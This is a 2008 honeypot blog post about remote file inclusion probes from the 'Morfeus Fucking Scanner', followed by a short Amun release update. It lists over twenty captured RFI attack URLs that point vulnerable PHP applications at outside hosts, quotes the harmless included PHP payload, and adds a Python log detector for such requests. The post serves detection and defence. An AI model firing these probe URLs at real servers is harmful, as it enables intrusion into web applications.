Virus Blog

Morfeus Fucking Scanner

— Posted by zeroq @ 12:00 - 20 Aug, 2008

I am currently playing around with a webserver emulation module for Amun, to catch remote file inclusion (RFI) attacks on certain web applications. While doing so I stumbled across the user-agent "Morfeus Fucking Scanner". It seems to be a piece of software that scans webservers for vulnerable web applications, like Mambo or Cacti. The following URLs were tried at our honeypots:

/admin/business_inc/saveserver.php?thisdir=http://203.206.169.35/1.gif?/
/admin/business_inc/saveserver.php?thisdir=http://makina.org/sugarfree/1.gif?/
/board/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/board/rgboard/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/cacti/include/config_settings.php?config[include_path]=http://makina.org/sugarfree/1.gif?/
/calendar/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/calendar/tools/send_reminders.php?noSet=0&includedir=http://64.15.76.197/modules/1.gif?/
/cal/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/components/com_facileforms/facileforms.frame.php?ff_compath=http://203.206.169.35/1.gif?/
/dotproject/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/dotproject/includes/db_adodb.php?baseDir=http://makina.org/sugarfree/1.gif?/
/ical/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.206.169.35/1.gif?/
/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://makina.org/sugarfree/1.gif?/
/index.php?id=http://makina.org/sugarfree/1.gif?/
/index.php?option=com_custompages&cpage=http://203.206.169.35/1.gif?/
/joomla/components/com_facileforms/facileforms.frame.php?ff_compath=http://203.206.169.35/1.gif?/
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.206.169.35/1.gif?/
//?mosConfig_absolute_path=http://203.206.169.35/1.gif?/
/project/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/projects/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/rgboard/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/user/soapCaller.bs
/webcalendar/tools/send_reminders.php?includedir=http://makina.org/sugarfree/1.gif?/
/webcalendar/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/webcalendar/tools/send_reminders.php?noSet=0&includedir=http://64.15.76.197/modules/1.gif?/

The file 1.gif, which the attacker tries to include every time, is a simple PHP script that just echoes some wise words:

<?php echo("Morfeus hacked you"); ?>

No need to get excited, though =)
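As an added detection example (not code from the original post or from the Amun project), the following Python script flags the kind of probes listed above in web server access logs: any query parameter whose value is itself an absolute URL, plus the scanner's user-agent string. It assumes the Apache/nginx "combined" log format; the sample log lines are constructed with documentation IP addresses as clients, while the request paths are the ones observed at the honeypot.

```python
import re
from urllib.parse import parse_qsl

# Apache/nginx "combined" access-log format (simplified regex, sufficient for the sample below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)  # parameter value that is itself a URL
SCANNER_UA = "Morfeus Fucking Scanner"

def rfi_params(request_path):
    """Return (name, value) pairs from the query string whose value is a remote URL."""
    # The probes above end the URL with '?/' so whatever the vulnerable include() appends
    # becomes a query string to the attacker's host; matching the scheme prefix is enough.
    _, _, query = request_path.partition("?")
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL_RE.match(value)]

def scan_log(text):
    """Return (client_ip, path, reasons) for each line that carries an RFI-style parameter
    or the scanner's user-agent; other lines are dropped."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line
        reasons = []
        hits = rfi_params(m["path"])
        if hits:
            reasons.append("rfi:" + ",".join(name for name, _ in hits))
        if SCANNER_UA.lower() in m["ua"].lower():
            reasons.append("scanner-ua")
        if reasons:
            findings.append((m["ip"], m["path"], reasons))
    return findings

# Constructed sample log (client IPs are documentation addresses); the request paths are
# the ones observed at the honeypot above, plus one benign request for contrast.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Aug/2008:11:58:01 +0200] "GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/ HTTP/1.1" 404 512 "-" "Morfeus Fucking Scanner"
203.0.113.7 - - [20/Aug/2008:11:58:02 +0200] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://makina.org/sugarfree/1.gif?/ HTTP/1.1" 404 512 "-" "Morfeus Fucking Scanner"
198.51.100.9 - - [20/Aug/2008:11:59:10 +0200] "GET /index.php?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Aug/2008:11:59:30 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 512 "-" "Morfeus Fucking Scanner"
"""

if __name__ == "__main__":
    for ip, path, reasons in scan_log(SAMPLE_LOG):
        print(ip, ",".join(reasons), path)
```

The last sample line shows why both checks are worth keeping: the soapCaller.bs request carries no URL parameter and would only be caught by the user-agent match.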



Still Alive

— Posted by zeroq @ 09:11 - 11 Aug, 2008

Yep, I am still alive. I moved from Aachen to Mannheim, thus I didn't have much time for writing. The next release of Amun is almost ready; this time only little things have changed, but thanks to Lukas from glasblog and the guy(s) behind Joebox Security there is a new submission module for the Joebox. Furthermore, I had to adjust the submit-cwsandbox module, as the result URL seems to have changed a bit.
